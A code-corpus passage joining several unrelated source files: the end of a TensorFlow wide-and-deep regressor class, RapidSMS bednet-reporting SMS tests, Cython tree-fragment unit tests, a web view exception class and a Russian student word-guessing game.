# common settings weight_column_name=weight_column_name, # wide settings linear_feature_columns=[sparse_feature_a_x_sparse_feature_b], linear_optimizer=tf.train.FtrlOptimizer(...), # deep settings dnn_feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb], dnn_hidden_units=[1000, 500, 100], dnn_optimizer=tf.train.ProximalAdagradOptimizer(...)) # To apply L1 and L2 regularization, you can set optimizers as follows: tf.train.ProximalAdagradOptimizer( learning_rate=0.1, l1_regularization_strength=0.001, l2_regularization_strength=0.001) # It is same for FtrlOptimizer. # Input builders def input_fn_train: # returns x, y ... def input_fn_eval: # returns x, y ... def input_fn_predict: # returns x, None ... estimator.train(input_fn_train) estimator.evaluate(input_fn_eval) estimator.predict(input_fn_predict) ``` Input of `fit`, `train`, and `evaluate` should have following features, otherwise there will be a `KeyError`: if `weight_column_name` is not `None`, a feature with `key=weight_column_name` whose value is a `Tensor`. for each `column` in `dnn_feature_columns` + `linear_feature_columns`: - if `column` is a `SparseColumn`, a feature with `key=column.name` whose `value` is a `SparseTensor`. - if `column` is a `WeightedSparseColumn`, two features: the first with `key` the id column name, the second with `key` the weight column name. Both features' `value` must be a `SparseTensor`. - if `column` is a `RealValuedColumn, a feature with `key=column.name` whose `value` is a `Tensor`. """ @deprecated_arg_values( _FIX_GLOBAL_STEP_INCREMENT_DATE, _FIX_GLOBAL_STEP_INCREMENT_INSTRUCTIONS, fix_global_step_increment_bug=False) def __init__(self, # _joint_linear_weights pylint: disable=invalid-name model_dir=None, weight_column_name=None, linear_feature_columns=None, linear_optimizer=None, _joint_linear_weights=False, dnn_feature_columns=None, dnn_optimizer=None, dnn_hidden_units=None, dnn_activation_fn=nn.relu, dnn_dropout=None, gradient_clip_norm=None, enable_centered_bias=False, label_dimension=1, config=None, feature_engineering_fn=None, embedding_lr_multipliers=None, input_layer_min_slice_size=None, fix_global_step_increment_bug=False): """Initializes a DNNLinearCombinedRegressor instance. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Args: model_dir: Directory to save model parameters, graph and etc. This can also be used to load checkpoints from the directory into a estimator to continue training a previously saved model. weight_column_name: A string defining feature column name representing weights. It is used to down weight or boost examples during training. It will be multiplied by the loss of the example. linear_feature_columns: An iterable containing all the feature columns used by linear part of the model. All items in the set must be instances of classes derived from `FeatureColumn`. linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to the linear part of the model. If `None`, will use a FTRL optimizer. _joint_linear_weights: If True a single (possibly partitioned) variable will be used to store the linear model weights. It's faster, but requires that all columns are sparse and have the 'sum' combiner. dnn_feature_columns: An iterable containing all the feature columns used by deep part of the model. All items in the set must be instances of classes derived from `FeatureColumn`. dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to the deep part of the model. If `None`, will use an Adagrad optimizer. dnn_hidden_units: List of hidden units per layer. All layers are fully connected. dnn_activation_fn: Activation function applied to each layer. If None, will use `tf.nn.relu`. dnn_dropout: When not None, the probability we will drop out a given coordinate. gradient_clip_norm: A float > 0. If provided, gradients are clipped to their global norm with this clipping ratio. See tf.clip_by_global_norm for more details. enable_centered_bias: A bool. If True, estimator will learn a centered bias variable for each class. Rest of the model structure learns the residual after centered bias. label_dimension: Number of regression targets per example. This is the size of the last dimension of the labels and logits `Tensor` objects (typically, these have shape `[batch_size, label_dimension]`). config: RunConfig object to configure the runtime settings. feature_engineering_fn: Feature engineering function. Takes features and labels which are the output of `input_fn` and returns features and labels which will be fed into the model. embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to multiply with learning rate for the embedding variables. input_layer_min_slice_size: Optional. The min slice size of input layer partitions. If not provided, will use the default of 64M. fix_global_step_increment_bug: If `False`, the estimator needs two fit steps to optimize both linear and dnn parts. If `True`, this bug is fixed. New users must set this to `True`, but it the default value is `False` for backwards compatibility. Raises: ValueError: If both linear_feature_columns and dnn_features_columns are empty at the same time. """ linear_feature_columns = linear_feature_columns or [] dnn_feature_columns = dnn_feature_columns or [] self._feature_columns = linear_feature_columns + dnn_feature_columns if not self._feature_columns: raise ValueError("Either linear_feature_columns or dnn_feature_columns " "must be defined.") # TODO(b/35922130): Replace with `input_layer_partitioner` arg. input_layer_partitioner = None if input_layer_min_slice_size is not None: input_layer_partitioner = ( partitioned_variables.min_max_variable_partitioner( max_partitions=config.num_ps_replicas if config else 0, min_slice_size=input_layer_min_slice_size)) head = head_lib.regression_head( weight_column_name=weight_column_name, label_dimension=label_dimension, enable_centered_bias=enable_centered_bias) super(DNNLinearCombinedRegressor, self).__init__( model_fn=_dnn_linear_combined_model_fn, model_dir=model_dir, config=config, params={ "head": head, "linear_feature_columns": linear_feature_columns, "linear_optimizer": linear_optimizer, "joint_linear_weights": _joint_linear_weights, "dnn_feature_columns": dnn_feature_columns, "dnn_optimizer": dnn_optimizer, "dnn_hidden_units": dnn_hidden_units, "dnn_activation_fn": dnn_activation_fn, "dnn_dropout": dnn_dropout, "gradient_clip_norm": gradient_clip_norm, "embedding_lr_multipliers": embedding_lr_multipliers, "input_layer_partitioner": input_layer_partitioner, "fix_global_step_increment_bug": fix_global_step_increment_bug, }, feature_engineering_fn=feature_engineering_fn) def evaluate(self, x=None, y=None, input_fn=None, feed_fn=None, batch_size=None, steps=None, metrics=None, name=None, checkpoint_path=None, hooks=None): """See evaluable.Evaluable.""" # TODO(zakaria): remove once deprecation is finished (b/31229024) custom_metrics = {} if metrics: for key, metric in six.iteritems(metrics): if (not isinstance(metric, metric_spec.MetricSpec) and not isinstance(key, tuple)): custom_metrics[(key, prediction_key.PredictionKey.SCORES)] = metric else: custom_metrics[key] = metric return super(DNNLinearCombinedRegressor, self).evaluate( x=x, y=y, input_fn=input_fn, feed_fn=feed_fn, batch_size=batch_size, steps=steps, metrics=custom_metrics, name=name, checkpoint_path=checkpoint_path, hooks=hooks) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) @deprecated_arg_values( "2017-03-01", "Please switch to predict_scores, or set `outputs` argument.", outputs=None) def predict(self, x=None, input_fn=None, batch_size=None, outputs=None, as_iterable=True): """Returns predictions for given features. By default, returns predicted scores. But this default will be dropped soon. Users should either pass `outputs`, or call `predict_scores` method. Args: x: features. input_fn: Input function. If set, x must be None. batch_size: Override default batch size. outputs: list of `str`, name of the output to predict. If `None`, returns scores. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted scores (or an iterable of predicted scores if as_iterable is True). If `label_dimension == 1`, the shape of the output is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`. If `outputs` is set, returns a dict of predictions. """ if not outputs: return self.predict_scores( x=x, input_fn=input_fn, batch_size=batch_size, as_iterable=as_iterable) return super(DNNLinearCombinedRegressor, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=outputs, as_iterable=as_iterable) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) def predict_scores(self, x=None, input_fn=None, batch_size=None, as_iterable=True): """Returns predicted scores for given features. Args: x: features. input_fn: Input function. If set, x must be None. batch_size: Override default batch size. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted scores (or an iterable of predicted scores if as_iterable is True). If `label_dimension == 1`, the shape of the output is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`. """ key = prediction_key.PredictionKey.SCORES preds = super(DNNLinearCombinedRegressor, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=[key], as_iterable=as_iterable) if as_iterable: return (pred[key] for pred in preds) return preds[key] @deprecated("2017-03-25", "Please use Estimator.export_savedmodel() instead.") def export(self, export_dir, input_fn=None, input_feature_key=None, use_deprecated_input_fn=True, signature_fn=None, default_batch_size=1, exports_to_keep=None): """See BaseEstimator.export.""" def default_input_fn(unused_estimator, examples): return layers.parse_feature_columns_from_examples( examples, self._feature_columns) return super(DNNLinearCombinedRegressor, self).export( export_dir=export_dir, input_fn=input_fn or default_input_fn, input_feature_key=input_feature_key, use_deprecated_input_fn=use_deprecated_input_fn, signature_fn=signature_fn or export.regression_signature_fn, prediction_key=prediction_key.PredictionKey.SCORES, default_batch_size=default_batch_size, exports_to_keep=exports_to_keep) # Aliases # TODO(zakaria): Remove these aliases, See b/34751732 _DNNLinearCombinedEstimator = DNNLinearCombinedEstimator
rapidsms/rapidsms-legacy
refs/heads/master
apps/bednets/tests.py
4
from rapidsms.tests.scripted import TestScript from form.models import * from reporters.models import * import reporters.app as reporter_app import supply.app as supply_app import form.app as form_app import default.app as default_app from app import App from django.core.management.commands.dumpdata import Command import time import random import os from datetime import datetime class TestApp (TestScript): #apps = (reporter_app.App, App,form_app.App, supply_app.App, default_app.App ) apps = (reporter_app.App, App,form_app.App, supply_app.App ) # the test_backend script does the loading of the dummy backend that allows reporters # to work properly in tests fixtures = ['nigeria_llin', 'test_kano_locations', 'test_backend'] def setUp(self): TestScript.setUp(self) def testFixtures(self): self._testKanoLocations() self._testForms() self._testRoles() def testScript(self): a = """ 8005551219 > llin register 20 dl crummy user 8005551219 < Hello crummy! You are now registered as Distribution point team leader at KANO State. """ self.runScript(a) # this should succeed because we just created him reporters = Reporter.objects.all() Reporter.objects.get(alias="cuser") dict = {"alias":"fail"} # make sure checking a non-existant user fails self.assertRaises(Reporter.DoesNotExist, Reporter.objects.get, **dict) testRegistration = """ 8005551212 > llin my status 8005551212 < Please register your phone with RapidSMS. 8005551212 > llin register 20 dl dummy user 8005551212 < Hello dummy! You are now registered as Distribution point team leader at KANO State. 8005551212 > llin my status 8005551212 < I think you are dummy user. #duplicate submission test_reg_dup > llin register 20 dl duplicate user test_reg_dup < Hello duplicate! You are now registered as Distribution point team leader at KANO State. # this one should be a duplicate test_reg_dup > llin register 20 dl duplicate user test_reg_dup < Hello again duplicate! You are already registered as a Distribution point team leader at KANO State. # but all of these should create a new registration test_reg_dup > llin register 20 dl duplicate user withanothername test_reg_dup < Hello duplicate! You are now registered as Distribution point team leader at KANO State. test_reg_dup > llin register 20 dl duplicate userlonger test_reg_dup < Hello duplicate! You are now registered as Distribution point team leader at KANO State. test_reg_dup > llin register 20 dl duplicated user test_reg_dup < Hello duplicated! You are now registered as Distribution point team leader at KANO State. test_reg_dup > llin register 20 sm duplicate user test_reg_dup < Hello duplicate! You are now registered as Stock manager at KANO State. test_reg_dup > llin register 2001 dl duplicate user test_reg_dup < Hello duplicate! You are now registered as Distribution point team leader at AJINGI LGA. # case sensitivity test_reg_2 > llin REGISTER 20 dl another user test_reg_2 < Hello another! You are now registered as Distribution point team leader at KANO State. # different name formats test_reg_3 > llin register 20 dl onename test_reg_3 < Hello onename! You are now registered as Distribution point team leader at KANO State. # these fail test_reg_4 > llin register 20 dl mister three names test_reg_4 < Hello mister! You are now registered as Distribution point team leader at KANO State. test_reg_5 > llin register 20 dl mister four name guy test_reg_5 < Hello mister! You are now registered as Distribution point team leader at KANO State. # some other spellings test_reg_short > llin regstr 20 dl short user test_reg_short < Hello short! You are now registered as Distribution point team leader at KANO State. test_reg_short_2 > llin regs 20 dl short user test_reg_short_2 < Hello short! You are now registered as Distribution point team leader at KANO State. test_reg_short_3 > llin reg 20 dl short user test_reg_short_3 < Hello short! You are now registered as Distribution point team leader at KANO State. test_reg_long > llin registered 20 dl long user test_reg_long < Hello long! You are now registered as Distribution point team leader at KANO State. # extra spaces test_reg_8 > llin register 20 dl space guy test_reg_8 < Hello space! You are now registered as Distribution point team leader at KANO State. # new tests for more flexible roles test_reg_dl > llin register 20 dl distribution leader test_reg_dl < Hello distribution! You are now registered as Distribution point team leader at KANO State. test_reg_dl_2 > llin register 20 ds distribution leader test_reg_dl_2 < Hello distribution! You are now registered as Distribution point team leader at KANO State. test_reg_dl_3 > llin register 20 dm distribution leader test_reg_dl_3 < Hello distribution! You are now registered as Distribution point team leader at KANO State. test_reg_dl_4 > llin register 20 dp distribution leader test_reg_dl_4 < Hello distribution! You are now registered as Distribution point team leader at KANO State. test_reg_lf > llin register 20 lf lga focal person test_reg_lf < Hello lga! You are now registered as LGA focal person at KANO State. test_reg_lf > llin register 20 lp lga focal person test_reg_lf < Hello again lga! You are already registered as a LGA focal person at KANO State. # alas, we're not perfect test_reg_fail > llin rgstr 20 dl sorry guy test_reg_fail < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE """ testRegistrationErrors = """ 12345 > llin my status 12345 < Please register your phone with RapidSMS. 12345 > llin register 45 DL hello world 12345 < Invalid form. 45 not in list of location codes 12345 > llin my status 12345 < Please register your phone with RapidSMS. 12345 > llin register 20 pp hello world 12345 < Invalid form. Unknown role code: pp 12345 > llin my status 12345 < Please register your phone with RapidSMS. 12345 > llin register 6803 AL hello world 12345 < Invalid form. 6803 not in list of location codes. Unknown role code: AL 12345 > llin my status 12345 < Please register your phone with RapidSMS. """ testKeyword= """ tkw_1 > llin register 20 dl keyword tester tkw_1 < Hello keyword! You are now registered as Distribution point team leader at KANO State. # base case tkw_1 > llin nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # capitalize the domain tkw_1 > LLIN nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # drop an L tkw_1 > lin nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # mix the order - this is no longer supported #tkw_1 > ILLn nets 2001 123 456 78 90 #tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 #tkw_1 > ilin nets 2001 123 456 78 90 #tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # ll anything works? tkw_1 > ll nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 tkw_1 > llan nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # don't support w/o keyword tkw_1 > nets 2001 123 456 78 90 # the default app to the rescue! tkw_1 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE """ testNets= """ 8005551213 > llin register 2001 lf net guy 8005551213 < Hello net! You are now registered as LGA focal person at AJINGI LGA. 8005551213 > llin nets 2001 123 456 78 90 8005551213 < Thank you net. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 8005551213 > llin nets 2001 123 456 78 8005551213 < Invalid form. The following fields are required: discrepancy # test some of the different form prefix options # case sensitivity 8005551213 > llin NETS 2001 123 456 78 90 8005551213 < Thank you net. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # no s 8005551213 > llin net 2001 123 456 78 90 8005551213 < Thank you net. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # really? this works? 8005551213 > llin Nt 2001 123 456 78 90 8005551213 < Thank you net. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # something's gotta fail 8005551213 > llin n 2001 123 456 78 90 8005551213 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE 8005551213 > llin bednets 2001 123 456 78 90 8005551213 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE 8005551213 > llin ents 2001 123 456 78 90 8005551213 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE """ testNetCards= """ 8005551214 > llin register 200201 lf card guy 8005551214 < Hello card! You are now registered as LGA focal person at ALBASU CENTRAL Ward. 8005551214 > llin net cards 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 8005551214 > llin net cards 200201 123 456 8005551214 < Invalid form. The following fields are required: issued # test some of the different form prefix options # case sensitivity 8005551214 > llin NET CARDS 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 # no s 8005551214 > llin net card 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 # one word 8005551214 > llin netcards 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 8005551214 > llin netcard 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 # he he 8005551214 > llin nt cd 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 8005551214 > llin ntcrds 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 # something's gotta fail 8005551214 > llin cards 200201 123 456 78 8005551214 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE """ testUnregisteredSubmissions = """ tus_1 > llin net cards 200201 123 456 78 tus_1 < Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78. Please register your phone tus_1 > llin my status tus_1 < Please register your phone with RapidSMS. tus_2 > llin nets 2001 123 456 78 90 tus_2 < Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90. Please register your phone tus_2 > llin my status tus_2 < Please register your phone with RapidSMS. """ def testGenerateNetFixtures(self): """ This isn't actually a test. It just takes advantage of the test harness to spam a bunch of messages to the nigeria app and spit out the data in a format that can be sucked into a fixture. It should be moved to some data generator at some point, but is being left here for laziness sake """ # this is the number of net reports that will be generated count = 0 # the sender will always be the same, for now phone = "55555" expected_actual_match_percent = .8 # allow specifying the minimum and maximum dates for message generation min_date = datetime(2009,4,1) max_date = datetime(2009,4,30) min_time = time.mktime(min_date.timetuple()) max_time = time.mktime(max_date.timetuple()) # these are the locations that will be chosen. The actual # location will be a distribution point under one of these # wards wards = [200101, 200102, 200103, 200104, 200105, 200106, 200107, 200108, 200109, 200110, 200201] all_net_strings = [] for i in range(count): # this first part generates a net form at a random DP date = datetime.fromtimestamp(random.randint(min_time, max_time)) ward = Location.objects.get(code=random.choice(wards)) dp = random.choice(ward.children.all()) distributed = random.randint(50,500) expected = random.randint(0,2000) # create an actual amount based on the likelihood of match if random.random() < expected_actual_match_percent: actual = expected else: actual = random.randint(0,2000) discrepancy = random.randint(0,distributed/5) net_string = "%s@%s > llin nets %s %s %s %s %s" % (phone, date.strftime("%Y%m%d%H%M"), dp.code, distributed, expected, actual, discrepancy) all_net_strings.append(net_string) # the second part generates a net card form at a random MT date = datetime.fromtimestamp(random.randint(min_time, max_time)) ward = Location.objects.get(code=random.choice(wards)) dp = random.choice(ward.children.all()) mt = random.choice(dp.children.all()) settlements = random.randint(3, 50) people = random.randint(50, 600) coupons = random.randint(50, 600) net_card_string = "%s@%s > llin net cards %s %s %s %s" % (phone, date.strftime("%Y%m%d%H%M"), mt.code, settlements, people, coupons ) all_net_strings.append(net_card_string) script = "\n".join(all_net_strings) self.runScript(script) dumpdata = Command() filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"fixtures/test_net_data.json")) options = { "indent" : 2 } datadump = dumpdata.handle("bednets", **options) # uncomment these lines to save the fixture # file = open(filename, "w") # file.write(datadump) # file.close() # print "=== Successfully wrote fixtures to %s ===" % filename # def _testKanoLocations(self): #TODO test for DPs and MTs loc_types = LocationType.objects.all() self.assertEqual(6, len(loc_types)) state = LocationType.objects.get(name="State") lga = LocationType.objects.get(name="LGA") ward = LocationType.objects.get(name="Ward") locations = Location.objects.all() # 1 state self.assertEqual(1, len(locations.filter(type=state))) # 44 lgas self.assertEqual(44, len(locations.filter(type=lga))) # 484 wards self.assertEqual(484, len(locations.filter(type=ward))) kano = locations.get(type=state) self.assertEqual("KANO", kano.name) self.assertEqual(44, len(kano.children.all())) for lga in locations.filter(type=lga): self.assertEqual(kano, lga.parent) def _testForms(self): forms = Form.objects.all() self.assertEqual(5, len(forms)) for form_name in ["register", "issue", "receive", "nets", "netcards"]: # this will throw an error if it doesn't exist Form.objects.get(code__abbreviation=form_name) def _testRoles(self): # add this when we have a fixture for roles roles = Role.objects.all() self.assertEqual(4, len(roles)) for role_name in ["LGA focal person", "Ward supervisor", "Stock manager", "Distribution point team leader"]: # this will throw an error if it doesn't exist Role.objects.get(name=role_name)
PeterWangIntel/chromium-crosswalk
refs/heads/master
third_party/cython/src/Cython/Compiler/Tests/TestTreeFragment.py
131
from Cython.TestUtils import CythonTest from Cython.Compiler.TreeFragment import * from Cython.Compiler.Nodes import * from Cython.Compiler.UtilNodes import * import Cython.Compiler.Naming as Naming class TestTreeFragments(CythonTest): def test_basic(self): F = self.fragment(u"x = 4") T = F.copy() self.assertCode(u"x = 4", T) def test_copy_is_taken(self): F = self.fragment(u"if True: x = 4") T1 = F.root T2 = F.copy() self.assertEqual("x", T2.stats[0].if_clauses[0].body.lhs.name) T2.stats[0].if_clauses[0].body.lhs.name = "other" self.assertEqual("x", T1.stats[0].if_clauses[0].body.lhs.name) def test_substitutions_are_copied(self): T = self.fragment(u"y + y").substitute({"y": NameNode(pos=None, name="x")}) self.assertEqual("x", T.stats[0].expr.operand1.name) self.assertEqual("x", T.stats[0].expr.operand2.name) self.assert_(T.stats[0].expr.operand1 is not T.stats[0].expr.operand2) def test_substitution(self): F = self.fragment(u"x = 4") y = NameNode(pos=None, name=u"y") T = F.substitute({"x" : y}) self.assertCode(u"y = 4", T) def test_exprstat(self): F = self.fragment(u"PASS") pass_stat = PassStatNode(pos=None) T = F.substitute({"PASS" : pass_stat}) self.assert_(isinstance(T.stats[0], PassStatNode), T) def test_pos_is_transferred(self): F = self.fragment(u""" x = y x = u * v ** w """) T = F.substitute({"v" : NameNode(pos=None, name="a")}) v = F.root.stats[1].rhs.operand2.operand1 a = T.stats[1].rhs.operand2.operand1 self.assertEquals(v.pos, a.pos) def test_temps(self): TemplateTransform.temp_name_counter = 0 F = self.fragment(u""" TMP x = TMP """) T = F.substitute(temps=[u"TMP"]) s = T.body.stats self.assert_(isinstance(s[0].expr, TempRefNode)) self.assert_(isinstance(s[1].rhs, TempRefNode)) self.assert_(s[0].expr.handle is s[1].rhs.handle) if __name__ == "__main__": import unittest unittest.main()
dhocker/ahps_web
refs/heads/master
ahps_web/views/view_exception.py
1
# # AHPS Web - web server for managing an AtHomePowerlineServer instance # Copyright (C) 2014, 2015 Dave Hocker (email: AtHomeX10@gmail.com) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 3 of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the LICENSE file for more details. # # You should have received a copy of the GNU General Public License # along with this program (the LICENSE file). If not, see <http://www.gnu.org/licenses/>. # class ViewException(Exception): """ View detected exception. """ status_code = 500 def __init__(self, message, status_code=None, payload=None): Exception.__init__(self) self.message = message if status_code is not None: self.status_code = status_code self.payload = payload def to_dict(self): rv = dict(self.payload or ()) rv['message'] = self.message return rv
Mariaanisimova/pythonintask
refs/heads/master
BITs/2014/Abdrahmanova_G_I/task_9_1.py
1
#Задача 9. Вариант 1. #Создайте игру, в которой компьютер выбирает какое-либо слово, а игрок должен его отгадать. Компьютер сообщает игроку, сколько букв в слове, и дает пять попыток узнать, есть ли какая-либо буква в слове, причем программа может отвечать только "Да" и "Нет". Вслед за тем игрок должен попробовать отгадать слово. import random WORDS=("питон", "скорпион", "тритон", "крокодил", "ягуар", "леопард", "павлин", "антилопа") word=random.choice(WORDS) live=5 bukva="" slovo="" (number)=len(word) print("Компьютер загадал слово. Твоя цель угадать его. \nВ этом слове ",str(number)," букв.") print("У тебя "+str(live)+" попыток угадать буквы.") while live>0: bukva=input("Введите букву\n") if bukva in list (word): print("Да") live=live-1 else: print("Нет") live=live-1 if live==0: slovo=input("Ваши попытки кончились. \nВведите слово\n") if slovo==word: print("Поздравляю! Вы угадали слово :)") else: print("Вы не угадали слово :(") input("Нажмите Enter") #Abdrahmanova G. I. #11.04.2016